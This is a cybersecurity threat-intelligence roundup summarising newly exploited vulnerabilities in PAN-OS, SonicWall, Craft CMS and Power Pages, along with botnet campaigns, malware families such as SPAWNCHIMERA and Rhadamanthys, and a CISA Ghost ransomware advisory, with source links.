The cybersecurity threat landscape continues to evolve at an alarming pace. CISA has expanded its KEV catalog with four new vulnerabilities, including two in Palo Alto Networks and one each in SonicWall and Craft CMS, alongside ongoing exploitation of Microsoft Power Pages. Meanwhile, the agency’s latest #StopRansomware advisory highlights the growing threat of Ghost (Cring) Ransomware.  

Botnets continue to evolve, with EnemyBot and Sysrv-K exploiting weaknesses in Spring Cloud Gateway, while Mozi, Andr0xgh0st, Tsunami, Spytech Necro, and Sysrv intensify attacks on Atlassian products.  

Advanced malware threats are also on the rise, with SPAWN malware leveraging a zero-day in Ivanti  ASEC warns of an evolving delivery mechanism for the Rhadamanthys infostealer, signaling a shift in cybercriminal tactics. Furthermore, Green Nailao, a newly identified campaign, has been exploiting a Check Point security flaw to infiltrate European healthcare organizations and deploy sophisticated malware strains like NailaoLocker ransomware.  

With adversaries becoming increasingly strategic, organizations must reinforce their defenses to stay ahead of these ever-evolving cyber threats.

Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping to make informed decisions.  

‍CVE-2025-0108

An Authentication Bypass Vulnerability in the Palo Alto Networks PAN-OS Software with a high CVSS Score of 8.8, allows unauthorized access, posing risks to the integrity and confidentiality of affected systems. This vulnerability was initially discovered by Assetnote researchers during an analysis of patches for CVE-2024-0012 and CVE-2024-9474, both of which were actively exploited in November 2024. To further highlight the urgency of patching, Assetnote publicly released a proof-of-concept (PoC) exploit, making unpatched systems even more vulnerable. Given its security implications, this vulnerability has been added to the CISA’s Known Exploited Vulnerabilities (KEV) catalog.  

CVE-2025-0111

A File-Read Vulnerability in Palo Alto Networks PAN-OS allows an authenticated attacker with network access to the management web interface to read files accessible by the "nobody" user. Palo Alto Networks addressed the flaw on February 12,2025 but later updated its advisory to confirm active exploitation in the wild. With a high CVSS Score of 7.1, this vulnerability is being chained with CVE-2025-0108 and CVE-2024-9474, enabling more complex attack scenarios. As a result, CISA has added this vulnerability to its KEV catalog, urging organizations to apply patches immediately.

‍CVE-2025-23209

A Code Injection Vulnerability in Craft CMS allows for remote code execution (RCE) in Craft 4 and 5 installations where the security key has already been compromised. With a CVSS score of 8.0 (High), this flaw enables attackers to execute arbitrary code, putting affected systems at risk. Patched versions 4.13.8 and 5.5.8 have been released to mitigate the threat. Recognizing its exploitation potential, CISA has added this vulnerability to its KEV catalog, urging immediate updates.

‍CVE-2025-24989

An Elevation of Privilege Vulnerability in Microsoft Power Pages stems from improper access control within the low-code platform used for creating, hosting, and managing secure business websites. With a high CVSS Score of 8.2, this flaw allows an unauthorized attacker to elevate privileges over a network and bypass user registration controls, potentially compromising affected systems. Microsoft classified this vulnerability with an "Exploitation Detected" assessment, confirming at least one known instance of active exploitation. A security update has been released, and organizations are urged to apply the patch promptly to mitigate the risk.

‍CVE-2024-53704

An Improper Authentication Vulnerability in the SonicWall SonicOS  SSLVPN authentication mechanism allows remote attackers to bypass authentication, posing a severe security. Rated CVSS 9.8(Critical), this flaw was identified by Bishop Fox Researchers, who successfully exploited it on unpatched SonicWall firewalls. Shortly after a proof-of-concept (PoC) exploit was made public, Arctic Wolf observed active exploitation attempts in the wild. In response, SonicWall rolled out multiple patched versions to mitigate the threat. Due to its severity, and active exploitation, the vulnerability has been added to the CISA KEV catalog.

Telemetry collected from Loginsoft sensors were analyzed and processed to derive insights on what is actively being exploited and actively being scanned.  As source of truth, source IPv4 addresses & payloads can be provided on need-to-know basis.

Identified vulnerabilities exploited by botnets, including recent CVEs logged in Misp. Presenting the top 5 CVEs with payloads suggestive of botnet activities, like utilizing wget with IP addresses.

We proactively monitor the vulnerabilities which are targeted by adversaries. Each vulnerability is humanly studied and mapped with Mitre ATT&CK tactics and techniques. Source of information is derived from our vulnerability intelligence platform collected and curated information from various sources such as Twitter, Telegram, OSINT groups, Blogs, Data leak Sites and more.  

CVE-2025-0282

Cybersecurity researchers at JPCERT/CC have identified a significant evolution in the SPAWN malware family with the emergence of SPAWNCHIMERA, a more advanced and evasive variant. This new strain is actively exploiting CVE-2025-0282, a buffer overflow vulnerability in Ivanti Connect Secure, which was publicly disclosed in January 2025. Notably, SPAWNCHIMERA was detected in attacks prior to the vulnerability's disclosure, highlighting a sophisticated shift in tactics and potential zero-day exploitation.

CVE-2024-24919

Cyber defense analysts have uncovered a previously unknown threat activity cluster targeting European organizations, with a particular focus on the healthcare sector. This campaign, dubbed Green Nailao by Orange Cyberdefense CERT, involved the deployment of PlugX and its successor ShadowPad, sophisticated malware variants often linked to advanced persistent threats (APTs). In some instances, these intrusions escalated to the deployment of NailaoLocker ransomware. The attacks, observed between June and October 2024, leveraged CVE-2024-24919, a recently patched vulnerability in Check Point network gateway security products.  

CVE-2024-43572

AhnLab Security Emergency Response Center (ASEC) has issued an alert regarding a newly identified distribution method for the Rhadamanthys infostealer, a malware designed to extract sensitive data from compromised systems. This latest technique leverages MSC extension files, a format commonly associated with the Microsoft Management Console (MMC). Researchers have categorized MSC malware into two types: one variant exploits a vulnerability in apds.dll (CVE-2024-43572), while the other executes commands using Console Taskpad. Since June 2024, the prevalence of MSC-based malware has surged, with the CVE-2024-43572-exploiting variant emerging as the most widespread threat.

‍CISA Warns Against Ghost (Cring) Ransomware Exploits

The US Cybersecurity and Infrastructure Security Agency (CISA) has issued a Cybersecurity Advisory as part of its ongoing #StopRansomware initiative, providing critical insights for network defenders. The advisory focuses on Ghost (Cring) ransomware, which has been observed exploiting multiple vulnerabilities in Adobe, Microsoft, and Fortinet to gain initial access, posing significant risks to organizations.

It refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts and planning to expand.

1. https://arcticwolf.com/resources/blog/cve-2024-53704/  
2. https://www.cisa.gov/news-events/alerts/2025/02/18/cisa-adds-two-known-exploited-vulnerabilities-catalog  
3. https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-050a  
4. https://www.cisa.gov/news-events/alerts/2025/02/20/cisa-adds-two-known-exploited-vulnerabilities-catalog  
5. https://www.security.com/threat-intelligence/chinese-espionage-ransomware  
6. https://blogs.jpcert.or.jp/ja/2025/02/spawnchimera.html  
7. https://asec.ahnlab.com/en/86391/
8. https://www.orangecyberdefense.com/global/blog/cert-news/meet-nailaolocker-a-ransomware-distributed-in-europe-by-shadowpad-and-plugx-backdoors